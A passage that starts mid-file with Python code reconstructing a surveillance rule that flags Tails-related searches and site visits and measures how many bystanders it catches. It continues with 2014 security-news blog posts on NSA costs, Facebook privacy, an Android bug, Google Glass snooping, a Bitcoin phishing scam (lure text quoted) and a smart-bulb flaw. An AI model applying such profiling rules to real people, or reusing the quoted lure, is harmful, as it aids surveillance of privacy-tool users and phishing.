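TAILS_WEBSITES = ["tails.boum.org/", "linuxjournal.com/content/linux*"]


def word(text: str, terms: List[str]) -> bool:
    """Assumed word() semantics: any term occurs, case-insensitively, in the
    space-padded text."""
    haystack = " " + text.lower() + " "
    return any(term.lower() in haystack for term in terms)


def tails_terms_match(text: str) -> bool:
    """$TAILS_terms = word(group A) and word(group B): both groups must hit."""
    return word(text, TAILS_GROUP_A) and word(text, TAILS_GROUP_B)


def _pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Turn a rule pattern into a regex, treating '*' as 'anything' (assumed)."""
    return re.compile(".*".join(re.escape(part) for part in pattern.split("*")))


def tails_website_match(url: str) -> bool:
    """$TAILS_websites: either pattern occurs somewhere in the URL's host+path."""
    host_path = url.split("://", 1)[-1].lower()
    return any(_pattern_to_regex(p).search(host_path) for p in TAILS_WEBSITES)


def flagged(events: List[str]) -> List[str]:
    """Return the subset of events the rule selects. Anything containing '://'
    is treated as a visited URL, everything else as a search string."""
    return [e for e in events
            if (tails_website_match(e) if "://" in e else tails_terms_match(e))]


# Constructed sample events: a few searches and page visits, most of which
# have nothing to do with Tails or anonymity tools.
SAMPLE_EVENTS = [
    "tails linux live usb install",                       # genuine interest in Tails
    "https://tails.boum.org/download/index.en.html",      # visit to the Tails site
    "how to install linux on usb",                        # no group-A term: not selected
    "dog with two tails",                                 # group A only: not selected
    "fairy tails audio cd for kids",                      # 'tails' + ' CD ': bystander hit
    "ponytails irc channel",                              # substring 'tails' + ' IRC ': bystander hit
    "http://www.linuxjournal.com/content/linux-mint-17",  # Linux Journal article: selected
    "http://www.linuxjournal.com/about",                  # same site, pattern not met
]


def bystander_ratio(events: List[str], genuine: List[str]) -> float:
    """Share of selected events that the caller does NOT regard as genuine
    interest in Tails; mirrors the 'bystander' figure the article discusses."""
    hits = flagged(events)
    if not hits:
        return 0.0
    return sum(1 for h in hits if h not in genuine) / len(hits)


if __name__ == "__main__":
    selected = flagged(SAMPLE_EVENTS)
    for event in SAMPLE_EVENTS:
        print(("SELECTED  " if event in selected else "          ") + event)
    # Treat only the first two constructed events as genuine interest.
    print("bystander ratio:", bystander_ratio(SAMPLE_EVENTS, SAMPLE_EVENTS[:2]))
```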

Code Breakers or Deal Breakers

Whether or not consumer reluctance to engage online will make a visible dent on the 2014 earnings of online retailers, banks, and other players — like advertising-based services such as Facebook, Twitter, Google, and Yahoo — is hard to predict. But there have been some notable business hits directly attributable to the NSA revelations. Last month we learned that Verizon is not getting its German government contract renewed, with the NSA/GCHQ connection widely assumed to be the main reason. I couldn’t find an estimate of the value of that lost business, but last year we saw Boeing lose a $4.5 billion fighter jet deal to Sweden’s Saab because the buyer, Brazil, was upset about the NSA. Cloud business losses in the wake of the NSA revelations were predicted to be tens of billions of dollars last year, but as this article in Gigaom suggests, it’s complicated. However, this chart of the share price of American networking equipment maker Cisco, plotted against the NASDAQ for the first 12 months after the first Snowden revelations, suggests that the news has not been good for their business.

[Image: chart of Cisco’s share price plotted against the NASDAQ for the first 12 months after the first Snowden revelations]

Sanity, Transparency, and Proportionality

Just because the NSA has been — in the eyes of many — doing electronic surveillance the wrong way doesn’t mean they should stop doing it. Clearly it makes no sense to ban online surveillance. As our survey revealed, people see its value. But people also question its proportionality to the threat. Is this the best use of funds, given how much terrorist activity such surveillance seems to have missed? Would more targeted, better supervised surveillance work better? And what about good old-fashioned human intelligence? Are we neglecting that in the hope that big data analysis will give better results with less risk? Personally, I’m skeptical on that front. Given that there are real economic costs to the way the NSA has been running its operations, the arguments for improvement and reform would appear to be compelling.

Facebook settings – five steps for better privacy and security
http://www.welivesecurity.com/2014/07/08/facebook-account-settings/
Tue, 08 Jul 2014 15:31:17 +0000

Facebook has faced repeated controversy over privacy, with features such as Graph Search revealing information which users might have forgotten they ever “shared”. But there are steps users can take to manage the way Facebook uses their information.

The post Facebook settings – five steps for better privacy and security appeared first on We Live Security.

Facebook has once again found itself embroiled in controversy over privacy and ownership of data, after information emerged on a psychological experiment which involved altering the posts which appeared in users’ News Feeds in 2012.

Facebook has faced repeated controversy over privacy, with features such as Graph Search revealing information which users might have forgotten they ever “shared”.

Facebook settings explained

The only way to keep data truly private is not to share it on Facebook at all. But there are steps users can take using their Facebook settings to manage the way the social network uses data – and it’s worth refreshing your account, privacy-wise, even if you’re a seasoned and security-conscious site user, as new ‘features’ from Facebook often seem to involve further security concerns.

The most important thing to remember is that simply visiting the Facebook Settings menu is not enough. It’s a good first step, allowing you to take control of who you share posts with (see step one), how to control what other people post about you (step two) and apply quick controls to older posts (step three). But for a “deep clean”, you need to visit your profile page as well (click on your portrait in the top left of the main News Feed), and do some tidying in Activity Log, which details all your past posts and posts you have been tagged in (steps two and three). Facebook’s own guide to privacy offers some useful advice, broken down by section.

If you want to take control of your Facebook settings, it’s best done from a PC or Mac – Facebook’s mobile apps don’t offer the fine control that the browser version does.

Below are five quick steps to changing your Facebook settings and to ensure you’re managing what people know about you effectively.

1. Take control of your posts

The first step to ensuring you are not “oversharing” on Facebook is to use and understand Facebook’s Audience Selector tool. This appears as a drop-down menu on every picture, post and link you share (or have shared) on the network. You can also use this menu to limit posts retrospectively (a useful tool if you’re worried about work colleagues finding pictures you might have shared years ago).

Facebook has a detailed guide to using Audience Selector. It’s worth noting that if you share something once, then share it again, it will share with the audience you first selected by default. Be sure you know what audience you are sharing with – and that means policing your Friends list regularly. There’s little point limiting posts if you’re friends with people you don’t really know. If you have ever accepted a friend request from someone you don’t know (for instance, in a social game), it’s best to unfriend them. Befriending people on networks such as Facebook is a known tactic for identity fraudsters and other criminals – so it’s worth being cautious.

[Image: Use this menu to control who posts are shared with]

Once you’ve pruned your Friends list, you should limit ALL posts to Friends Only. That way you know who is seeing your posts. If anything is set to share with “Friends of Friends”, that basically means “anyone”. You have no control over who your friends have made friends with on the network, and trusting your data to these unknowns is unwise.

Trusting people you don’t know with your data has become even more risky due to the site’s new search engine, Graph Search. This lets any Facebook user search for things such as people’s Facebook Likes, or even their location, with search terms such as, “People who like pizza who live in…”. This can reveal data which could be damaging. One of the key steps to controlling any data on Facebook is to ensure that all posts are set to “Friends Only” or “Only Me”.

Make sure all your Facebook settings – photos, Likes, personal information – are set either to share with Friends Only or Only Me. You’ll have to visit both the main Privacy menu (under Settings) and Activity Log (under your Timeline, which is accessed by clicking your picture from the main menu), to ensure past posts don’t come back to haunt you.

2. Manage posts other people have tagged you in

Facebook’s Graph Search, introduced last year, radically increased the speed at which people could find information and images about people on Facebook. The tool, a powerful search engine built using Microsoft’s Bing, can “reveal” posts which are hidden from user timelines, and which users may have forgotten existed. It can also, worryingly, be used to find posts in which a user has been tagged – and managing this data requires an investment of time.

To regain control over tagging, you should use Facebook’s ‘review’ process, which allows you to approve whether you can be tagged in images and other posts. This allows you to refuse a tag, for instance, if it’s a private post and you’re not comfortable sharing it with colleagues. You can still be seen in the photo, of course, but it will not appear in your Timeline or via a search for your name. You will have to review each picture for it to appear – but the added security is worth the effort. To enable Tag Review, visit Facebook Settings, then Timeline and Tagging, then Review Tags. Set the menu to Enabled.

When you approve posts, it’s worth revisiting Audience Selector to see who they’re shared with. People often share posts with the friends lists of everyone in a photo, or with all guests at an event. If you’re not comfortable with this, but still want to share the post, choose Custom from the Audience Selector menu, and exclude people you don’t want to see it (for instance Friends of Those Tagged).

It’s also worth using Facebook’s Timeline to police photos you may have been tagged in in the past. Visit Activity Log (a box on the right hand side of your profile page, which you can access by clicking your portrait from the top right of the main news feed). This will allow you to see a full list of posts from your Timeline. Mouse over the picture or post you want to remove, click the down arrow, then click report/remove tag.

If you have previously hidden posts from Timeline, you should revisit them and set Audience Selector to “Only Me”. This ensures that people cannot find posts using Graph Search – posts hidden from your Timeline can still be visible, confusingly.

You will have to do this manually. Graph Search will not show off any photos or posts that are set to be private – i.e. ones that can be seen by “Only Me” or “Friends” – so choose these to be safe.

3. Make sure your Timeline doesn’t trip you up

Your Timeline is not a reliable indicator of what someone can find relating to you on Facebook – whether that be photos, comments, or Likes. Posts you have hidden from Timeline may well be visible – just not to someone browsing your page. If they search instead, for say “Photos of [Your Name]”, they’ll be clearly visible unless you’ve taken steps to alter your Facebook settings to police this.

The only tool which works to keep information private is Activity Log, which requires you to adjust privacy settings manually for each post. It’s worth doing – otherwise, site users can simply search your name, and “Photographs” to see every post that you are tagged in, regardless of whether it’s on your Timeline or not.

4. Delete your search history

For many Facebook users, it might come as news that Facebook stores your search history at all – but it does, and tailors the results you receive accordingly. This data can be quite private – for instance, if you’ve searched repeatedly for a specific person, this can be very obvious, even if someone happens to glance over your shoulder as you use the site, as the function will auto-suggest the names you’ve searched for most frequently.

Thankfully, it’s possible to delete this data entirely within your Facebook settings. Go to Activity Log (one of the options at the top of your Profile page), then select More, then Search. From this page, you’ll be given options to delete either individual searches, or your entire search history. By default, Facebook stores this data, and it’s available to anyone who sits down at a PC logged into your account.

5. Permanently delete your account – if you need to

From Facebook’s menus, it appears as if deactivating an account is the closest Facebook will let you get to deletion – but it’s actually possible to delete your account entirely.

This is a fairly drastic step, and it may be advisable to download a copy of your Facebook data before doing it. To do so, click the menu, then Facebook Settings, then the menu option, Download a copy of your Facebook data (below your General Account Settings), then Start My Archive.

A page with instructions on how to permanently delete your account is available here (note: you have to be logged in to Facebook to read these instructions, and following them will send a deletion request for that account). Once done, you have 14 days in which you can log back in and cancel the request, but after that point, there is no way to restore the data, and (crucially) people will not be able to search for or see your profile or any content you have shared on Facebook.

For a ‘softer’ option, ‘deactivating’ an account (found under Settings), lets you hide your profile and photos from Search, but the account can be reactivated, and some interactions (such as comments on other people’s pages) may still be visible.

Android bug in most smartphones could let rogue apps run wild
http://www.welivesecurity.com/2014/07/08/android-bug-could-let-apps-run-wild/
Tue, 08 Jul 2014 13:54:13 +0000

Nearly all Android smartphones contain bugs which can allow rogue apps to ignore the Permissions used to control them, according to German security researchers.

The post Android bug in most smartphones could let rogue apps run wild appeared first on We Live Security.

Nearly all Android smartphones contain bugs which can allow rogue apps to ignore the Permissions used to control them, according to research by German security company Curesec.

Curesec found two separate Android bugs, both of which have been active for months and even years – and can be exploited to place phone calls – potentially leaving phone users vulnerable to scams involving premium-rate numbers.

These Android bugs could also allow malicious apps to send instructions to carriers to change options on the phone such as call forwarding, according to The Register’s report – again, without being granted permission to do so, or alerting the user.

Android bug: permission denied

The exploits bypass the Permissions used to control what apps can and cannot do – so users would not be alerted that a malicious app could make calls, according to Curesec.

“Android normally has to grant permission so that your applications can conduct actions,” the researchers write. “If your installed application does not own the right to do a phone call, the Android OS should throw a permission denied.”

“However this bug is circumventing the situation and allows any malicious app to do a phone call, send [codes to the network] or hangup an ongoing call.”

PC World reports that Curesec believe one of the bugs was introduced in the Android Jelly Bean update, which was first made available in July 2012. The issue was patched in Android Kit Kat – but very few devices run the new software so far.

Active for years

The other Android bug is even older, introduced in Android Gingerbread. Taken together, The Register calculates, around 87% of current handsets are vulnerable to malware targeting the exploits.

Curesec offers two proof-of-concept apps to test whether Android handsets are vulnerable, available freely via their website.

In ESET’s Threat Trends Report predictions for this year, ESET experts warned of “an escalating increase in serious threats targeting Android phones and tablets – ESET detections of such malware increased more than 60% between 2012 and 2013. This trend is predicted to continue in 2014.”

ESET Latin America’s Research Laboratory in Buenos Aires points out that malware afflicting Android now uses classic PC attack methods – the discovery of vulnerabilities, then their exploitation through malicious code.

Thankfully, most of these threats can be avoided by sensible use of your device. Robert Lipovsky writes, “We encourage users to protect themselves against these threats using prevention and defensive measures. Adhering to security best practices, such as keeping away from untrustworthy apps and app sources, will reduce your risks.”

Google Glass wearers can steal passwords from 10ft away
http://www.welivesecurity.com/2014/07/08/google-glass-wearers-steal-passwords/
Tue, 08 Jul 2014 13:22:32 +0000

A new computer vision attack could allow Google Glass wearers to steal passwords typed in on nearby tablet or smartphones - even if the attackers do not have a clear view of the screen.

The post Google Glass wearers can steal passwords from 10ft away appeared first on We Live Security.

A new computer vision attack could allow Google Glass wearers to steal passwords typed in on nearby tablets or smartphones – even if the attackers do not have a clear view of the screen, according to a report by CNN.

The technique could allow attackers to crack 90% of passcodes from up to ten feet distance – and regardless of whether the screen is obscured by glare. The distance is even bigger if an attacker uses a hi-def camcorder – up to 150ft, according to Wired.

If they take a video, you lose everything

“I think of this as a kind of alert about Google Glass, smartwatches, all these devices,” says Dr Xinwen Fu of University of Massachusetts in Lowell.

“If someone can take a video of you typing on the screen, you lose everything.”

Instead of “watching” the screen, the software developed by Dr Fu tracks the user’s finger in video recordings – tracking the fingertip’s position relative to the screen. The software harvests a pattern of “touch points” where the finger has contacted the screen, and works out passwords based on that.

Fu will present his findings at Black Hat USA 2014, in Las Vegas on August 6 and 7.

The major thing is the angle

The attack is not limited to simple PIN codes. “We could get your bank account password,” Fu told CNN. The security expert says that the ability to adjust the angle (easy with Google Glass’s head-mounted camera) offers attackers an edge.

“The major thing here is the angle. To make this attack successful the attacker must be able to adjust the angle to take a better video … they see your finger, the password is stolen,” Fu said.

Fu and his colleagues will show off a Privacy Enhancing Keyboard application for Android devices, which pops up a randomized keyboard whenever a password is required, but reverts to a normal QWERTY keyboard when not in use.

The researchers demonstrated the attack against Apple’s iPad, a Google Nexus 7 tablet, and an iPhone 5.

Fu says that his research is substantially different from previous attacks based on recognising touch inputs – as it does not use a language model to estimate touched keys. It relies purely on computer vision tools applied to an image of the finger using the touchscreen.

Fu says that the technique works quickly and unobtrusively enough to be a genuine concern in public arenas such as conferences.

“We are interested in scenarios such as conferences and similar gathering places where a Google Glass, webcam, or smartphone can be used for a stealthy attack,” he says.

Online Summer Safety Tips
http://www.welivesecurity.com/podcasts/online-summer-safety-tips/
Mon, 07 Jul 2014 21:54:18 +0000

Silk Road Bitcoin auction bidders targeted in phishing scam
http://www.welivesecurity.com/2014/07/07/silk-road-bitcoin-auction-bidders-targeted-phishing-scam/
Mon, 07 Jul 2014 15:33:01 +0000
A leaked list of people who had enquired about the auction for bitcoins from the “dark market” Silk Road provided a target for phishing scammers - and at least one site fell for the scam emails.

A leaked list of people who had enquired about the auction for Bitcoins from the “dark market” Silk Road provided a target for phishing scammers – and at least one site fell for the scam emails.

A reported 100 Bitcoins ($63,300) were stolen from Bitcoin Reserve via a fake login page which harvested email credentials, according to TechCrunch’s report.

Coindesk reports that the scam targeted individuals on a list of people who had expressed interest in the auction for Bitcoins from Silk Road. The list was leaked after a member of the U.S. Marshals Service used CC instead of BCC on an email, exposing every recipient’s address to every other recipient.

Fake interview scam

The scam email – which the Wall Street Journal said had been forwarded to several people on the list – said, “I work for BitFilm Production. We are currently putting together some media for a client regarding the Silk Road seized Bitcoin auction by the USMS. I am hoping you could spare five minutes to review my interview questions and see if you would be willing to participate as a source.”

While BitFilm Production is a real company, it had not sent the emails.

Interested parties who replied to the first email received a second email with what appeared to be a Google Document – instead, the link led to a scam site which required an email login.

A staff member at one firm, Bitcoin Reserve, logged in – and scammers then used his password and email to send a request to staff at the firm to forward Bitcoin to an online ‘wallet’.

100 Bitcoin stolen

Around 100 Bitcoin – worth $636 each at the time of writing, according to XE.com – were transferred before the scam was uncovered, according to the Wall Street Journal.

The U.S. Marshals Service said in a statement, “We encourage anyone believed to be a victim of a phishing scam to contact the appropriate law enforcement authorities. The FBI is the investigative agency for phishing scams in the United States. Go to www.ic3.gov/default.aspx for additional guidance.”

TechCrunch commented, “Given the irreversible nature of Bitcoin transactions I’d expect these scams to happen more and more often.”

Users of cryptocurrencies such as Bitcoin have been repeatedly targeted with scams and malware attacks in recent months. Read further We Live Security stories about Bitcoin.

 

Wi-Fi light bulbs in security alert over wireless blackout hack
http://www.welivesecurity.com/2014/07/07/wi-fi-light-bulbs-in-security-alert-over-wireless-blackout-hack/
Mon, 07 Jul 2014 14:42:44 +0000
A high-profile ‘connected’ lighting system had a critical vulnerability which allowed attackers to take control of the entire system, switching off light bulbs at will, and which could be executed by criminals within 100 feet of a home.

A high-profile ‘connected’ lighting system had a critical vulnerability which allowed attackers to take control of the entire system, switching off its Wi-Fi light bulbs at will, and which could be executed by criminals within 100 feet of a home, according to specialist security firm Context.

Context found the vulnerability in the LiFX system, a well-known Kickstarter-funded lighting system in which a network of Wi-Fi light bulbs can be controlled via a smartphone app.

LiFX describes the system as a “Wi-Fi enabled, multi-color, energy efficient LED light bulb that you can control with your smartphone.”

Electronics Weekly said that the hack was a “warning for all Internet of Things companies”.

Printers and baby monitors also at risk

Speaking to Electronics Weekly, Context’s Michael Jordon said, “It is clear that in the dash to get onto the IoT bandwagon, security is not being prioritized as highly as it should be in many connected devices. We have also found vulnerabilities in other internet connected devices from home storage systems and printers to baby monitors and children’s toys.”

The researchers found a vulnerability in the wireless mesh network the bulbs used to communicate, which could have enabled attackers to control the system.

Context said that by gaining control of one “master” bulb, they could control the entire network, and intercept communications containing the bulbs’ network credentials – all without the smartphone app being alerted that there was anything wrong.

The firm admits that obtaining the firmware was difficult – it had to take a hammer to a bulb and reverse-engineer the firmware from the electronics – but says that later in a product’s lifecycle the process would be easier, once firmware updates become available as downloads on the internet.

Context said in its blog post, “With any internet connecting device, whether phone, laptop, light bulb or rabbit, there is always a chance of someone being able to hack it.”

LiFX has since issued a patch for the vulnerability and communications between bulbs will now be encrypted.

Hacking a Wi-Fi lightbulb

Speaking to CBR Online, Michael Jordon of Context said, “Hacking into the light bulb was certainly not trivial but would be within the capabilities of experienced cyber criminals.

“In some cases, these vulnerabilities can be overcome relatively quickly and easily as demonstrated by working with the LIFX developers. In other cases the vulnerabilities are fundamental to the design of the products.

“What is important is that these measures are built into all IoT devices from the start and if vulnerabilities are discovered, which seems to be the case with many IoT companies, they are fixed promptly before users are affected.”

Last year, the Philips Hue “connected lighting” system was criticized over its security after a researcher showed off an attack which could have caused a “perpetual blackout” in users’ homes.

Facebook may face FTC fines over research into users’ emotions
http://www.welivesecurity.com/2014/07/07/facebook-epic-ftc-complaint-emtional-research-privacy/
Mon, 07 Jul 2014 06:22:34 +0000
With EPIC filing an FTC privacy complaint against Facebook, which is already the subject of a Consent Order due to a previous privacy settlement, the social network could be facing a hefty fine for emotion-based manipulation of the Newsfeed for research purposes.

Facebook’s 2012 experiment in manipulating the emotions of users, documented in research published last month, may do more than upset people and raise serious privacy issues; it may also cost the social network a lot of money in 2014. That’s because Facebook has been in trouble over matters of data privacy before, leaving it exposed to potentially hefty fines. In November 2011, Facebook agreed to a proposed settlement with the Federal Trade Commission (FTC), something we blogged about numerous times. As we noted back then, the settlement:

“bars Facebook from making any further deceptive privacy claims, requires that the company get consumers’ approval before it changes the way it shares their data, and requires that it obtain periodic assessments of its privacy practices by independent, third-party auditors for the next 20 years.”

Facebook agreed to this in order to settle FTC charges that it deceived consumers “by telling them they could keep their information on Facebook private, and then repeatedly allowing it to be shared and made public.” Included in that settlement, finalized by the FTC in August of 2012, is this language:

“When the Commission issues a consent order on a final basis, it carries the force of law with respect to future actions. Each violation of such an order may result in a civil penalty of up to $16,000.”

This is the same type of provision that resulted in a $22.5 million fine for Google in 2012, when the FTC charged that Google, operating under a similar FTC settlement, misrepresented to users of Apple’s Safari browser “that it would not place tracking ‘cookies’ or serve targeted ads to those users.” This was deemed to violate the earlier settlement meant to resolve FTC charges that Google used deceptive tactics and violated its privacy promises with the social network, Google Buzz. That Consent Order, in October 2011, “barred Google from – among other things – misrepresenting the extent to which consumers can exercise control over the collection of their information.”

Bearing all of the above in mind — the numerous privacy-related FTC settlements and FTC Consent Orders, the potential for fines, and the timeline — it might seem quite staggering that someone at Facebook still thought it was okay to conduct an experiment on users, without telling them or getting their specific, individual permission, during the week of January 11–18, 2012. However, it has been my experience that companies of the size attained by Facebook by the end of 2011 often fail to keep all departments and personnel on the same page, particularly when it comes to matters of privacy.

A classic indicator of this type of corporate dysfunction is “post facto” remediation, which in this particular case took the form of a change Facebook made to its data use policy in May 2012, four months after the research, adding a previously unmentioned use of your Facebook data:

  • For internal operations, including troubleshooting, data analysis, testing, research and service improvement.

As the journalist Kashmir Hill, a keen “watcher” of Facebook, pointed out in Forbes, that provision was not in place when Facebook intentionally manipulated the “Newsfeed” for hundreds of thousands of users in order to gauge their emotional response:

“In January 2012, the policy did not say anything about users potentially being guinea pigs made to have a crappy day for science, nor that “research” is something that might happen on the platform.”

To drive the point home, Hill’s article provides this handy link to a PDF of the pre-research version of the Facebook Data Use Policy. Hill also presents the arguments offered by Facebook defenders, namely that “they did this to improve the service” and “every website is doing A/B testing all the time.” However, both arguments seem to miss the point about this research experiment, as Hill herself opines, “the Facebook study with its intention to manipulate the Facebook environment for unknowing users to see whether it made them feel elated or depressed seems different to me than the normal ‘will this make someone more likely to buy this thing’ kind of testing.”

I concur. When you go shopping, at a website or brick-and-mortar store, you know that what you see is what the retailer wants you to see. You are prepared for the fact that what you see will be influenced by what the retailer knows about you. That is entirely different from a. Facebook choosing the term “Newsfeed” to describe a very selective view of your social network’s activity driven by an algorithm, and b. manipulating that algorithm to manipulate people’s emotions, without their knowledge or permission.

Now that EPIC (the Electronic Privacy Information Center) has filed formal legal documents with the FTC, alleging that Facebook engaged in deceptive trade practices and violated a 2012 Consent Order entered into with the FTC, there is potential for Facebook to be hit with FTC fines. I think it is quite possible that the commissioners will agree with the arguments made in the complaint (PDF). Bear in mind that the FTC takes EPIC seriously (it was an EPIC complaint that brought about the FTC action against Google mentioned earlier).

And that belated addition of “research” to the Facebook data use policy? It may come back to bite Facebook given point two of the complaint: “At the time of the experiment, Facebook did not state in the Data Use Policy that user data would be used for research purposes.” It is going to be hard for Facebook to argue that the provisions of the earlier version of the policy covered research when it later added research as a specific use.

So, how would those fines, if levied, be calculated? That appears to be up to the discretion of the commissioners. However, I expect that someone within Facebook is currently doing some research that goes like this:

  • Assume each person manipulated by the research = 1 violation,
  • where fine per violation = $16,000,
  • then maximum potential fine = 689,003 x $16,000 = $11,024,048,000.

America’s FTC is not the only body investigating the Facebook research project. Data protection authorities in the UK and Europe are said to be looking into it. This is not surprising since a. some 80% of Facebook users are outside America, and b. many Europeans have strong opinions about privacy rights and ethical research. A useful document to read in this regard is the Framework for Research Ethics (FRE) published by the Economic and Social Research Council (ESRC). The second of the six “Principles, procedures and minimum requirements of the Framework for Research Ethics” reads:

  • Research staff and participants must normally be informed fully about the purpose, methods and intended possible uses of the research, what their participation in the research entails and what risks, if any, are involved.

The framework acknowledges there may be isolated exceptions to informed consent, but makes it clear that these are very narrow, and I don’t think they would apply to Facebook research. What do you think about Facebook’s experiment? Does it bother you? Leave a comment and let us know.
